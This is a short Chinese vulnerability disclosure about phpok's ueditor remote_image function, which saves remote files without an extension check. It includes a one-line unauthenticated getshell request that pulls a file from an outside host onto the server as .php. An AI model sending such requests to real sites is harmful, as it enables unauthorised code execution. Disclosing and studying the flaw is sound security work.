无任何限制，不用注册账号，不用csrf，不用注入。一个请求直接getshell。

不得不说phpok的输入处理做的还是不错的。。。不过这里就出了一个问题

详细说明：

/framework/www/ueditor_control.php行61

remote_image_f函数没对远程文件后缀做检查直接保存到本地

这个真心没什么好分析的我就不贴代码分析了

漏洞证明：

构造请求

/index.php?c=ueditor&f=remote_image&upfile=http://qaz.me/1.txt?.php

我这里1.txt的内容是

测试问题嘛 不做破坏

shell地址直接返回了。这里不返回也没事，文件名可以自己算出来。

http://www.phpok.com/res/201406/01/d0cb55e3d1b41b9a_36_0.php

本文来源：SecYe安全网[http://www.secye.com] (责任编辑：SecYe安全)

• ·安卓Message APP拒绝服务ddos漏洞破绽bug
• ·Consumer Review Script 1.0 - SQL Injec
• ·Struts2 新漏洞（S2-052）出现利用实例；
• ·PHP Dashboards NEW 4.4 - SQL Injection
• ·Job Board Software 1.0 - SQL Injection
• ·Babysitter Website Script 1.0 - SQL In
• ·Escort Marketplace 1.0 - SQL Injection
• ·Apache Struts 2.5 < 2.5.12 - REST P
• ·Struts2 S2-052(CVE-2017-9805)远程代码
• ·FineCMS SYS_KEY未初始化导致任意文件写
• ·OrientDB <=2.22 代码执行
• ·Linux内核又爆远程DoS漏洞CVE-2017-7645
• ·使用CTS进行漏洞检测及原理浅析
• ·WordPress Plugin Ultimate Product Cata
• ·GLPI 0.90.4 - SQL Injection
• ·WordPress Plugin Event List <= 0.7.